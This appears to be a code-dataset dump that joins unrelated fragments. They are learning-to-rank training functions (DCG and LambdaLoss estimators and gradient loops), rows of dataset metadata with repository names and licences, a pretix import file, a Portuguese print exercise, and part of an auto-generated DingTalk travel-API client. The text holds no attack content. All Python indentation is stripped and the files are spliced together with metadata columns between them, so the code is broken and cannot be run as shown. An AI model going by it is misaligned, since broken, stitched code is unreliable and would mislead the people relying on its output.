s_i, e_i = data_split.doclist_ranges[qid:qid+2]
q_scores = all_scores[s_i:e_i]
if not rerank:
q_inv_prop = inv_prop[s_i:e_i]
inv_ranking = clk.rank_and_invert(q_scores)[1]+1.
result += np.sum(q_inv_prop*inv_ranking)
else:
less_mask = np.less_equal(q_scores[:, None],
q_scores[None, :]).astype(np.float64)
pair_inv_prop = rerank_get(qid, inv_prop)
result += np.sum(less_mask*pair_inv_prop)
# result += np.sum((less_mask*2.)*pair_inv_prop.T)
denom += np.sum(np.diag(pair_inv_prop))
if rerank:
result /= denom
return result
def calc_true_dcg_loss(ranking_model, data_split, cutoff=0):
all_docs = data_split.feature_matrix
all_scores = np.dot(all_docs, ranking_model)
result = 0.
denom = 0.
for qid in np.arange(data_split.num_queries()):
s_i, e_i = data_split.doclist_ranges[qid:qid+2]
q_scores = all_scores[s_i:e_i]
q_labels = data_split.query_labels(qid)
label_filter = np.greater(q_labels, 2)
inv_ranking = clk.rank_and_invert(q_scores)[1]
dcg_gain = 1./np.log2(inv_ranking[label_filter]+2.)
if cutoff > 0:
dcg_gain[np.greater_equal(inv_ranking[label_filter], cutoff)] = 0.
result += np.sum(dcg_gain)
denom += np.sum(label_filter)
return -result/denom
def estimate_dcg_loss(ranking_model,
data_split,
clicks,
cutoff=0):
total_clicks = clicks['num_clicks']
doc_clicks = clicks['clicks_per_doc'].astype(np.float64)
inv_prop = clicks['average_weights']*(doc_clicks/float(total_clicks))
inv_prop /= np.sum(inv_prop)
all_docs = data_split.feature_matrix
all_scores = np.dot(all_docs, ranking_model)
rerank = clicks['rerank']
if rerank:
rerank_ranges = clicks['rerank_ranges']
inv_ranking = clicks['inverted_ranking']
n_doc_per_q = (data_split.doclist_ranges[1:]
- data_split.doclist_ranges[:-1])
def rerank_get(qid, values):
s_j, e_j = rerank_ranges[qid:qid+2]
n = n_doc_per_q[qid]
return np.reshape(values[s_j:e_j], (n, n))
result = 0.
denom = 0.
for qid in clicks['queries']:
s_i, e_i = data_split.doclist_ranges[qid:qid+2]
q_scores = all_scores[s_i:e_i]
if not rerank:
q_inv_prop = inv_prop[s_i:e_i]
inv_ranking = clk.rank_and_invert(q_scores)[1]
dcg_gain = 1./np.log2(inv_ranking+2.)
if cutoff > 0:
dcg_gain[np.greater_equal(inv_ranking, cutoff)] = 0.
result += np.sum(dcg_gain*q_inv_prop)
else:
q_prop = rerank_get(qid, inv_prop)
q_log_rnk = inv_ranking[s_i:e_i]
less_mask = np.less_equal(q_scores[:, None],
q_scores[None, :]).astype(np.float64)
low_rnk, low_w, up_w = dcg_rerank_weights(
q_log_rnk,
less_mask,
q_prop,
clicks['cutoff'])
l_dcg_w = 1./np.log2(low_rnk+1.)
u_dcg_w = 1./np.log2(low_rnk+2.)
dcg_w = low_w * l_dcg_w + up_w * u_dcg_w
result += np.sum(dcg_w)
denom += np.sum(np.diag(q_prop))
if rerank:
result /= denom
return -result
def dcg_estimate_rerank_weights(log_rnk, less_mask, prop, cutoff):
n_doc = log_rnk.size
always_included = np.less(log_rnk, cutoff-1)
sometimes_included = np.logical_not(always_included)
lower_rank = np.sum(less_mask*always_included[None, :], axis=1)
lower_rank[sometimes_included] += 1
added_to_rank = less_mask*sometimes_included[None, :]
prop_added = np.sum(added_to_rank*prop, axis=1)
prop_added[sometimes_included] = 0.
prop_not_added = np.diag(prop) - prop_added
return lower_rank, prop_not_added, prop_added
def dcg_rerank_weights(log_rnk, less_mask, prop, cutoff):
n_doc = log_rnk.size
always_included = np.less(log_rnk, cutoff-1)
sometimes_included = np.logical_not(always_included)
lower_rank = np.sum(less_mask*always_included[None, :], axis=1)
lower_rank[sometimes_included] += 1
added_to_rank = less_mask[always_included, :]*sometimes_included[None, :]
prop_added = np.sum(added_to_rank*prop[always_included, :], axis=1) #- np.diag(prop*sometimes_included[None, :])
prop_not_added = np.diag(prop)[always_included] - prop_added
up_w = np.zeros((n_doc, n_doc))
down_w = np.zeros((n_doc, n_doc))
down_w[always_included, :] = prop_not_added[:, None] * always_included[None, :]
down_w[sometimes_included, :] = prop[sometimes_included, :]
up_w[always_included, :] = prop_added[:, None] * always_included[None, :]
up_w[always_included, :] += prop[always_included, :] * added_to_rank
return lower_rank, down_w, up_w
def optimize(loss_name,
data,
train_clicks,
validation_clicks,
learning_rate,
trial_epochs,
max_epochs=50,
epsilon_thres=0.0001,
learning_rate_decay=0.97,
cutoff=5):
if loss_name == 'monotonic':
est_loss_fn = estimate_dcg_loss
true_loss_fn = calc_true_dcg_loss
else:
est_loss_fn = estimate_loss
true_loss_fn = calc_true_loss
total_clicks = train_clicks['num_clicks']
ave_weights = train_clicks['average_weights']
doc_clicks = train_clicks['clicks_per_doc'].astype(np.float64)
train_queries = train_clicks['queries']
rerank = train_clicks['rerank']
inv_prop = ave_weights*(doc_clicks/float(total_clicks))
if not rerank:
inv_prop /= np.sum(inv_prop)
else:
rerank_ranges = train_clicks['rerank_ranges']
inv_ranking = train_clicks['inverted_ranking']
n_doc_per_q = (data.train.doclist_ranges[1:]
- data.train.doclist_ranges[:-1])
def rerank_get(qid, values):
s_j, e_j = rerank_ranges[qid:qid+2]
n = n_doc_per_q[qid]
return np.reshape(values[s_j:e_j], (n, n))
self_norm = 0.
for qid in train_queries:
q_prop = rerank_get(qid, inv_prop)
self_norm += np.sum(np.diag(q_prop))
inv_prop /= self_norm
best_model = np.zeros(data.train.datafold.num_features)
best_loss = np.inf
best_epoch = 0
pivot_loss = np.inf
model = np.zeros(data.train.datafold.num_features)
start_time = time.time()
absolute_error = 1.-np.sum(inv_prop)
print('Normalization error: %s' % absolute_error)
num_docs = data.train.num_docs()
doc_feat = data.train.feature_matrix
epoch_i = 0
cur_loss = est_loss_fn(model,
data.validation,
validation_clicks)
true_loss = true_loss_fn(model,
data.validation)
print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
stop_epoch = trial_epochs
while epoch_i < min(stop_epoch, max_epochs):
permutation = np.random.permutation(train_queries)
for qid in permutation:
q_docs = data.train.query_feat(qid)
q_scores = np.dot(q_docs, model)
n_docs = q_docs.shape[0]
less_mask = np.less_equal(q_scores[:, None], q_scores[None, :]+1.).astype(float)
s_i, e_i = data.train.doclist_ranges[qid:qid+2]
if not rerank:
q_prop = inv_prop[s_i:e_i]
activation_gradient = -less_mask*q_prop[:, None]
else:
q_prop = rerank_get(qid, inv_prop)
activation_gradient = -less_mask*q_prop
if loss_name == 'monotonic':
if not rerank:
up_rank = np.sum(np.maximum(1 - (q_scores[:, None] - q_scores[None, :]), 0), axis=1)
dcg_weights = 1./(np.log2(up_rank+1.)**2*np.log(2)*(up_rank+1))
activation_gradient *= dcg_weights[:, None]
else:
q_log_rnk = inv_ranking[s_i:e_i]
low_rnk, low_w, up_w = dcg_rerank_weights(q_log_rnk,
less_mask,
q_prop,
cutoff)
l_dcg_w = 1./(np.log2(low_rnk+1.)**2*np.log(2)*(low_rnk+1))
u_dcg_w = 1./(np.log2(low_rnk+2.)**2*np.log(2)*(low_rnk+2))
dcg_w = low_w * l_dcg_w[:, None] + up_w * u_dcg_w[:, None]
activation_gradient = -less_mask*dcg_w
elif loss_name == 'lambdaloss-truncated':
raise NotImplementedError('Truncated loss needs implementation for optimize.')
np.fill_diagonal(activation_gradient,
np.diag(activation_gradient)
- np.sum(activation_gradient, axis=1))
doc_weights = np.sum(activation_gradient, axis=0)
gradient = np.sum(q_docs * doc_weights[:, None], axis=0)
model += (learning_rate*gradient
*(learning_rate_decay**epoch_i))
epoch_i += 1
cur_loss = est_loss_fn(model,
data.validation,
validation_clicks)
true_loss = true_loss_fn(model,
data.validation)
print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
if cur_loss < best_loss:
best_model = model
best_loss = cur_loss
best_epoch = epoch_i
if pivot_loss - cur_loss > epsilon_thres:
pivot_loss = cur_loss
stop_epoch = epoch_i + trial_epochs
true_loss = true_loss_fn(model,
data.validation)
result = {
'model': best_model,
'estimated_loss': best_loss,
'true_loss': true_loss,
'epoch': best_epoch,
'total_time_spend': time.time()-start_time,
'time_per_epoch': (time.time()-start_time)/float(epoch_i),
'learning_rate': learning_rate,
'trial_epochs': trial_epochs,
'learning_rate_decay': learning_rate_decay,
}
# print(learning_rate, clip_thres, best_epoch, best_loss, true_loss)
return result
def linear_diff_grad(scores):
return np.less_equal(scores[:, None], scores[None, :]+1.).astype(float)
def sigmoid_diff_grad(scores):
score_diff = scores[:, None] - scores[None, :]
# for stability we cap this at 700
score_diff = np.maximum(score_diff, -700.)
exp_diff = np.exp(-score_diff)
return 1./((1+exp_diff)*np.log(2.))*exp_diff
def optimize_dcg(
loss_name,
data,
train_clicks,
validation_clicks,
learning_rate,
trial_epochs,
max_epochs=50,
epsilon_thres=0.0001,
learning_rate_decay=0.97,
cutoff=5):
est_loss_fn = estimate_dcg_loss
true_loss_fn = calc_true_dcg_loss
total_clicks = train_clicks['num_clicks']
ave_weights = train_clicks['average_weights']
doc_clicks = train_clicks['clicks_per_doc'].astype(np.float64)
train_queries = train_clicks['queries']
inv_prop = ave_weights*(doc_clicks/float(total_clicks))
inv_prop /= np.sum(inv_prop)
best_model = np.zeros(data.train.datafold.num_features)
best_loss = np.inf
best_epoch = 0
pivot_loss = np.inf
model = np.zeros(data.train.datafold.num_features)
start_time = time.time()
absolute_error = 1.-np.sum(inv_prop)
print('Normalization error: %s' % absolute_error)
num_docs = data.train.num_docs()
doc_feat = data.train.feature_matrix
epoch_i = 0
cur_loss = est_loss_fn(model,
data.validation,
validation_clicks,
cutoff)
true_loss = true_loss_fn(model,
data.validation,
cutoff)
print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
stop_epoch = trial_epochs
while epoch_i < min(stop_epoch, max_epochs):
permutation = np.random.permutation(train_queries)
for qid in permutation:
q_docs = data.train.query_feat(qid)
q_scores = np.dot(q_docs, model)
n_docs = q_docs.shape[0]
s_i, e_i = data.train.doclist_ranges[qid:qid+2]
q_prop = inv_prop[s_i:e_i]
if loss_name in ['monotonic',
'log_monotonic',
'relevant_rank',
'log_relevant_rank']:
if loss_name in ['monotonic', 'relevant_rank']:
diff_grad = linear_diff_grad(q_scores)
elif loss_name in ['log_monotonic', 'log_relevant_rank']:
diff_grad = sigmoid_diff_grad(q_scores)
activation_gradient = -diff_grad*q_prop[:, None]
if 'monotonic' in loss_name:
if loss_name == 'monotonic':
up_rank = np.sum(np.maximum(1 - (q_scores[:, None] - q_scores[None, :]), 0), axis=1)
elif loss_name == 'log_monotonic':
score_diff = q_scores[:, None] - q_scores[None, :]
up_rank = np.sum(
np.log2(1 + np.exp(-score_diff)),
axis=1)
dcg_weights = 1./(np.log2(up_rank+1.)**2*np.log(2)*(up_rank+1))
activation_gradient *= dcg_weights[:, None]
elif loss_name in ['lambdaloss@k', 'lambdaloss-full', 'lambdaloss-truncated']:
q_inv = clk.rank_and_invert(q_scores)[1]
prop_diff = q_prop[:, None] - q_prop[None, :]
prop_mask = np.less_equal(prop_diff, 0.)
if loss_name == 'lambdaloss-truncated':
rnk_vec = np.less(q_inv, cutoff)
rnk_mask = np.logical_or(rnk_vec[:, None],
rnk_vec[None, :])
prop_mask = np.logical_or(np.logical_not(rnk_mask), prop_mask)
rank_diff = np.abs(q_inv[:, None] - q_inv[None, :])
rank_diff[prop_mask] = 1.
disc_upp = 1. / np.log2(rank_diff+1.)
disc_low = 1. / np.log2(rank_diff+2.)
if loss_name == 'lambdaloss@k':
disc_upp[np.greater(rank_diff, cutoff)] = 0.
disc_low[np.greater(rank_diff, cutoff-1)] = 0.
pair_w = disc_upp - disc_low
pair_w *= np.abs(prop_diff)
pair_w[prop_mask] = 0.
score_diff = q_scores[:, None] - q_scores[None, :]
score_diff[prop_mask] = 0.
safe_diff = np.minimum(-score_diff, 500)
act = 1./(1 + np.exp(safe_diff))
act[prop_mask] = 0.
safe_exp = pair_w - 1.
safe_exp[prop_mask] = 0.
log2_grad = 1./(act**pair_w*np.log(2))
power_grad = pair_w*(act)**safe_exp
sig_grad = act*(1-act)
activation_gradient = -log2_grad*power_grad*sig_grad
np.fill_diagonal(activation_gradient,
np.diag(activation_gradient)
- np.sum(activation_gradient, axis=1))
doc_weights = np.sum(activation_gradient, axis=0)
# print('########')
# print(q_prop)
# print(doc_weights)
gradient = np.sum(q_docs * doc_weights[:, None], axis=0)
model += (learning_rate*gradient
*(learning_rate_decay**epoch_i))
epoch_i += 1
cur_loss = est_loss_fn(model,
data.validation,
validation_clicks,
cutoff)
true_loss = true_loss_fn(model,
data.validation,
cutoff)
print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
if cur_loss < best_loss:
best_model = model
best_loss = cur_loss
best_epoch = epoch_i
if pivot_loss - cur_loss > epsilon_thres:
pivot_loss = cur_loss
stop_epoch = epoch_i + trial_epochs
true_loss = true_loss_fn(best_model,
data.validation,
cutoff)
result = {
'model': best_model,
'estimated_loss': best_loss,
'true_loss': true_loss,
'epoch': best_epoch,
'total_time_spend': time.time()-start_time,
'time_per_epoch': (time.time()-start_time)/float(epoch_i),
'learning_rate': learning_rate,
'trial_epochs': trial_epochs,
'learning_rate_decay': learning_rate_decay,
}
# print(learning_rate, clip_thres, best_epoch, best_loss, true_loss)
return result
def lambdaloss_rerank_weights(log_rnk, less_mask, opt_cutoff, log_cutoff):
n_doc = log_rnk.size
always_included = np.less(log_rnk, log_cutoff-1)
sometimes_included = np.logical_not(always_included)
lower_rank = np.sum(less_mask*always_included[None, :], axis=1)
lower_rank[sometimes_included] += 1
always_ind = np.where(always_included)[0]
sometimes_ind = np.where(sometimes_included)[0]
higher_rank = lower_rank[always_ind, None] + less_mask[always_ind[:, None], sometimes_ind[None, :]]
lower_distance = np.zeros((n_doc, n_doc))
lower_distance[always_ind[:, None], sometimes_ind[None, :]] = higher_rank - lower_rank[None, sometimes_ind]
# lower_distance[sometimes_ind[:, None], always_ind[None, :]] = higher_rank.T - lower_rank[sometimes_ind, None]
lower_distance += lower_distance.T
high_mask = np.less(higher_rank, opt_cutoff)
low_mask = np.less(lower_rank, opt_cutoff)
sometimes_mask = np.logical_or(high_mask, low_mask[None, sometimes_ind])
lower_weight = np.zeros((n_doc, n_doc))
lower_weight[always_ind[:, None], sometimes_ind[None, :]] = np.logical_or(high_mask, low_mask[None, sometimes_ind])
lower_weight += lower_weight.T
lower_distance[always_ind[:, None], always_ind[None, :]] = lower_rank[always_ind, None] - lower_rank[None, always_ind]
# lower_distance[always_ind[None, :], always_ind[:, None]] = lower_rank[None, always_ind] - lower_rank[always_ind, None]
lower_distance = np.abs(lower_distance)
higher_distance = np.zeros((n_doc, n_doc))
higher_weight = np.zeros((n_doc, n_doc))
n_sometimes = np.sum(sometimes_included)
if n_sometimes == 0:
lower_weight = np.logical_or(low_mask[:, None], low_mask[None, :]).astype(np.float64)
else:
higher_distance[always_ind[:, None], always_ind[None, :]] = lower_distance[always_ind[:, None], always_ind[None, :]] + 1
# higher_distance[always_ind[None, :], always_ind[:, None]] = lower_distance[always_ind[None, :], always_ind[:, None]] + 1
cutoff_check = np.logical_or(high_mask[:, None, :], high_mask[None, :, :])
less_always = less_mask[always_ind[:, None], sometimes_ind[None, :]]
xor_less_always = np.logical_xor(
less_always[:,None,:], less_always[None, :, :]
)
high_count = np.logical_and(cutoff_check, xor_less_always)
low_count = np.logical_and(cutoff_check, np.logical_not(xor_less_always))
lower_weight[always_ind[:, None], always_ind[None, :]] = np.sum(low_count, axis=2)/float(n_sometimes)
higher_weight[always_ind[:, None], always_ind[None, :]] = np.sum(high_count, axis=2)/float(n_sometimes)
return lower_distance, lower_weight, higher_distance, higher_weight
def optimize_rerank_dcg(
loss_name,
data,
train_clicks,
validation_clicks,
learning_rate,
trial_epochs,
max_epochs=50,
epsilon_thres=0.0001,
learning_rate_decay=0.97,
cutoff=5,
log_cutoff=5):
assert loss_name == 'lambdaloss-truncated'
est_loss_fn = estimate_dcg_loss
true_loss_fn = calc_true_dcg_loss
total_clicks = train_clicks['num_clicks']
ave_weights = train_clicks['average_weights']
doc_clicks = train_clicks['clicks_per_doc'].astype(np.float64)
train_queries = train_clicks['queries']
inv_prop = ave_weights*(doc_clicks/float(total_clicks))
rerank_ranges = train_clicks['rerank_ranges']
inv_ranking = train_clicks['inverted_ranking']
n_doc_per_q = (data.train.doclist_ranges[1:]
- data.train.doclist_ranges[:-1])
def rerank_get(qid, values):
s_j, e_j = rerank_ranges[qid:qid+2]
n = n_doc_per_q[qid]
return np.reshape(values[s_j:e_j], (n, n))
self_norm = 0.
for qid in train_queries:
q_prop = rerank_get(qid, inv_prop)
self_norm += np.sum(np.diag(q_prop))
inv_prop /= self_norm
best_model = np.zeros(data.train.datafold.num_features)
best_loss = np.inf
best_epoch = 0
pivot_loss = np.inf
model = np.zeros(data.train.datafold.num_features)
start_time = time.time()
absolute_error = 1.-np.sum(inv_prop)
print('Normalization error: %s' % absolute_error)
num_docs = data.train.num_docs()
doc_feat = data.train.feature_matrix
epoch_i = 0
cur_loss = est_loss_fn(model,
data.validation,
validation_clicks,
cutoff)
true_loss = true_loss_fn(model,
data.validation,
cutoff)
print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
stop_epoch = trial_epochs
while epoch_i < min(stop_epoch, max_epochs):
permutation = np.random.permutation(train_queries)
for qid in permutation:
q_prop = rerank_get(qid, inv_prop)
if np.sum(q_prop) == 0:
continue
q_prop = np.diag(q_prop)
q_docs = data.train.query_feat(qid)
q_scores = np.dot(q_docs, model)
n_docs = q_docs.shape[0]
less_mask = np.less_equal(
q_scores[:, None],
q_scores[None, :]
).astype(float)
s_i, e_i = data.train.doclist_ranges[qid:qid+2]
q_log_rnk = inv_ranking[s_i:e_i]
low_diff, low_w, up_diff, up_w = lambdaloss_rerank_weights(
q_log_rnk,
less_mask,
cutoff,
log_cutoff)
def grad_calc(rank_diff, diff_weights):
prop_diff = q_prop[:, None] - q_prop[None, :]
prop_mask = np.less_equal(prop_diff, 0.)
prop_mask = np.logical_or(prop_mask,
np.less_equal(diff_weights, 0.))
rank_diff[prop_mask] = 1.
# tiebreaker
rank_diff[np.less(rank_diff, 1)] = 1
disc_upp = 1. / np.log2(rank_diff+1.)
disc_low = 1. / np.log2(rank_diff+2.)
if loss_name == 'lambdaloss@k':
disc_upp[np.greater(rank_diff, cutoff)] = 0.
disc_low[np.greater(rank_diff, cutoff-1)] = 0.
pair_w = disc_upp - disc_low
pair_w *= np.abs(prop_diff)
pair_w[prop_mask] = 0.
score_diff = q_scores[:, None] - q_scores[None, :]
score_diff[prop_mask] = 0.
safe_diff = np.minimum(-score_diff, 500)
act = 1./(1 + np.exp(safe_diff))
act[prop_mask] = 0.
safe_exp = pair_w - 1.
safe_exp[prop_mask] = 0.
log2_grad = 1./(act**pair_w*np.log(2))
power_grad = pair_w*(act)**safe_exp
sig_grad = act*(1-act)
return -log2_grad*power_grad*sig_grad
low_grad = grad_calc(low_diff, low_w)
up_grad = grad_calc(up_diff, up_w)
activation_gradient = low_w*low_grad + up_w*up_grad
np.fill_diagonal(activation_gradient,
np.diag(activation_gradient)
- np.sum(activation_gradient, axis=1))
doc_weights = np.sum(activation_gradient, axis=0)
# print('########')
# print(q_prop)
# print(doc_weights)
gradient = np.sum(q_docs * doc_weights[:, None], axis=0)
model += (learning_rate*gradient
*(learning_rate_decay**epoch_i))
epoch_i += 1
cur_loss = est_loss_fn(model,
data.validation,
validation_clicks,
cutoff)
true_loss = true_loss_fn(model,
data.validation,
cutoff)
print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
if cur_loss < best_loss:
best_model = model
best_loss = cur_loss
best_epoch = epoch_i
if pivot_loss - cur_loss > epsilon_thres:
pivot_loss = cur_loss
stop_epoch = epoch_i + trial_epochs
if log_cutoff == 1:
break
true_loss = true_loss_fn(best_model,
data.validation,
cutoff)
result = {
'model': best_model,
'estimated_loss': best_loss,
'true_loss': true_loss,
'epoch': best_epoch,
'total_time_spend': time.time()-start_time,
'time_per_epoch': (time.time()-start_time)/float(epoch_i),
'learning_rate': learning_rate,
'trial_epochs': trial_epochs,
'learning_rate_decay': learning_rate_decay,
}
# print(learning_rate, clip_thres, best_epoch, best_loss, true_loss)
return result
| 34.300265
| 126
| 0.618256
| 3,633
| 25,931
| 4.064134
| 0.058904
| 0.013884
| 0.021131
| 0.004876
| 0.828717
| 0.796004
| 0.759499
| 0.74128
| 0.72042
| 0.704775
| 0
| 0.015275
| 0.26532
| 25,931
| 756
| 127
| 34.300265
| 0.75975
| 0.034476
| 0
| 0.738983
| 0
| 0
| 0.045954
| 0
| 0
| 0
| 0
| 0
| 0.001695
| 1
| 0.028814
| false
| 0
| 0.005085
| 0.001695
| 0.062712
| 0.015254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa774ae6cfc9c041d8585dc35f9c0d4842c28ba4
| 152
|
py
|
Python
|
src/pretix/base/exporters/__init__.py
|
upsidedownpancake/pretix
|
bfeeb1028c9eccab4936029db7c38edd4cd5aad5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/pretix/base/exporters/__init__.py
|
upsidedownpancake/pretix
|
bfeeb1028c9eccab4936029db7c38edd4cd5aad5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/pretix/base/exporters/__init__.py
|
upsidedownpancake/pretix
|
bfeeb1028c9eccab4936029db7c38edd4cd5aad5
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2017-08-09T17:11:28.000Z
|
2017-08-09T17:11:28.000Z
|
from .answers import * # noqa
from .invoices import * # noqa
from .json import * # noqa
from .mail import * # noqa
from .orderlist import * # noqa
| 25.333333
| 32
| 0.671053
| 20
| 152
| 5.1
| 0.4
| 0.490196
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230263
| 152
| 5
| 33
| 30.4
| 0.871795
| 0.157895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa9fd00bb9b943777133b360cb069bd1b9be8827
| 40
|
py
|
Python
|
exercicios-Python/ex001.py
|
marcelo-py/Exercicios-Python
|
d654d54821983897dbc377a2d3db97671dd75b5b
|
[
"MIT"
] | null | null | null |
exercicios-Python/ex001.py
|
marcelo-py/Exercicios-Python
|
d654d54821983897dbc377a2d3db97671dd75b5b
|
[
"MIT"
] | null | null | null |
exercicios-Python/ex001.py
|
marcelo-py/Exercicios-Python
|
d654d54821983897dbc377a2d3db97671dd75b5b
|
[
"MIT"
] | null | null | null |
print('\033[1;33;45mOlá, mundo!\033[m')
| 20
| 39
| 0.65
| 8
| 40
| 3.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.289474
| 0.05
| 40
| 1
| 40
| 40
| 0.394737
| 0
| 0
| 0
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
aaaa1f7d7f5cf2285ef082456e4f02ad6746edf6
| 52,730
|
py
|
Python
|
dingtalk/python/alibabacloud_dingtalk/alitrip_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 15
|
2020-08-27T04:10:26.000Z
|
2022-03-07T06:25:42.000Z
|
dingtalk/python/alibabacloud_dingtalk/alitrip_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 1
|
2020-09-27T01:30:46.000Z
|
2021-12-29T09:15:34.000Z
|
dingtalk/python/alibabacloud_dingtalk/alitrip_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 5
|
2020-08-27T04:07:44.000Z
|
2021-12-03T02:55:20.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_dingtalk.alitrip_1_0 import models as dingtalkalitrip__1__0_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
def __init__(
self,
config: open_api_models.Config,
):
super().__init__(config)
self._endpoint_rule = ''
if UtilClient.empty(self._endpoint):
self._endpoint = 'api.dingtalk.com'
def approve_city_car_apply(
self,
request: dingtalkalitrip__1__0_models.ApproveCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.ApproveCityCarApplyHeaders()
return self.approve_city_car_apply_with_options(request, headers, runtime)
async def approve_city_car_apply_async(
self,
request: dingtalkalitrip__1__0_models.ApproveCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.ApproveCityCarApplyHeaders()
return await self.approve_city_car_apply_with_options_async(request, headers, runtime)
def approve_city_car_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.ApproveCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.ApproveCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.corp_id):
body['corpId'] = request.corp_id
if not UtilClient.is_unset(request.operate_time):
body['operateTime'] = request.operate_time
if not UtilClient.is_unset(request.remark):
body['remark'] = request.remark
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.third_part_apply_id):
body['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse(),
self.do_roarequest('ApproveCityCarApply', 'alitrip_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
async def approve_city_car_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.ApproveCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.ApproveCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.corp_id):
body['corpId'] = request.corp_id
if not UtilClient.is_unset(request.operate_time):
body['operateTime'] = request.operate_time
if not UtilClient.is_unset(request.remark):
body['remark'] = request.remark
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.third_part_apply_id):
body['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse(),
await self.do_roarequest_async('ApproveCityCarApply', 'alitrip_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
def bill_settement_hotel(
self,
request: dingtalkalitrip__1__0_models.BillSettementHotelRequest,
) -> dingtalkalitrip__1__0_models.BillSettementHotelResponse:
runtime = util_models.RuntimeOptions()
